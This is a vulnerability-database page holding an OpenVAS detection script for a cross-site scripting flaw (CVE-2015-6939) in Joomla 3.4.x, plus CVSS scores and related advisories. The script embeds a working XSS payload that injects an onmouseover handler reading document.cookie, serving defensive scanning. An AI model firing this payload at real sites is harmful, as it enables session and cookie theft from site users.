Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasCopyright (C) 2015 Greenbone AGOPENVAS:1361412562310806600
HistoryOct 19, 2015 - 12:00 a.m.

Joomla CMS 'login' Module Cross-Site Scripting Vulnerability

2015-10-1900:00:00
Copyright (C) 2015 Greenbone AG
plugins.openvas.org
14

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

5.6

Confidence

High

EPSS

0.003

Percentile

65.2%

JSON

Joomla is prone to a cross-site scripting (XSS) vulnerability.

# SPDX-FileCopyrightText: 2015 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:joomla:joomla";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.806600");
  script_version("2023-07-25T05:05:58+0000");
  script_cve_id("CVE-2015-6939");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_tag(name:"last_modification", value:"2023-07-25 05:05:58 +0000 (Tue, 25 Jul 2023)");
  script_tag(name:"creation_date", value:"2015-10-19 15:49:11 +0530 (Mon, 19 Oct 2015)");

  script_name("Joomla CMS 'login' Module Cross-Site Scripting Vulnerability");

  script_tag(name:"summary", value:"Joomla is prone to a cross-site scripting (XSS) vulnerability.");

  script_tag(name:"vuldetect", value:"Send a crafted request via HTTP GET and
  check whether it is able to read cookie or not.");

  script_tag(name:"insight", value:"Flaw is due to error in login module which
  does not properly filter HTML code from user-supplied input before displaying
  the input.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote
  attackers to execute arbitrary script code in a user's browser session within
  the trust relationship between their browser and the server.");

  script_tag(name:"affected", value:"Joomla versions 3.4.x before 3.4.4.");

  script_tag(name:"solution", value:"Upgrade to version 3.4.4 or later.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"qod_type", value:"remote_analysis");

  script_xref(name:"URL", value:"http://www.securitytracker.com/id/1033541");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/76750");
  script_xref(name:"URL", value:"https://packetstormsecurity.com/files/133907");

  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2015 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("joomla_detect.nasl");
  script_mandatory_keys("joomla/installed");
  script_require_ports("Services/www", 80);
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");

if(!http_port = get_app_port(cpe:CPE))
  exit(0);

if(!dir = get_app_location(cpe:CPE, port:http_port))
  exit(0);

if (dir == "/")
  dir = "";

url = dir + "/index.php/?Itemid=1&option=com_search&searchword=%f6%22%20on" +
            "mouseover%3dprompt%28document.cookie%29%20//&task=search";

if(http_vuln_check(port:http_port, url:url, check_header:TRUE,
   pattern:"onmouseover=prompt\(document.cookie\)",
   extra_check:'content="Joomla!'))
{
  report = http_report_vuln_url( port:http_port, url:url );
  security_message(port:http_port, data:report);
  exit(0);
}

exit(99);

Related

joomla 1
freebsd 1
nessus 2
cvelist 1
nvd 1
packetstorm 1
cve 1
zdt 1
prion 1
joomla
joomla
[20150908] - Core - XSS Vulnerability
2015-08-18 00:00:00
freebsd
freebsd
Joomla! -- Core - XSS Vulnerability
2015-09-08 00:00:00
nessus
nessus
FreeBSD : Joomla! -- Core - XSS Vulnerability (f8c37915-7ac5-11e5-b35a-002590263bf5)
2015-10-26 00:00:00
Joomla! 3.4.x < 3.4.4 Login Module XSS
2015-09-18 00:00:00
cvelist
cvelist
CVE-2015-6939
2015-09-18 16:00:00
nvd
nvd
CVE-2015-6939
2015-09-18 16:59:00
packetstorm
packetstorm
Joomla! CMS 3.4.3 Cross Site Scripting
2015-10-09 00:00:00
cve
cve
CVE-2015-6939
2015-09-18 16:59:00
zdt
zdt
Joomla! CMS 3.4.3 Cross Site Scripting Vulnerability
2015-10-09 00:00:00
prion
prion
Cross site scripting
2015-09-18 16:59:00

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

5.6

Confidence

High

EPSS

0.003

Percentile

65.2%

JSON
Related for OPENVAS:1361412562310806600
joomla1freebsd1nessus2cvelist1nvd1packetstorm1cve1zdt1prion1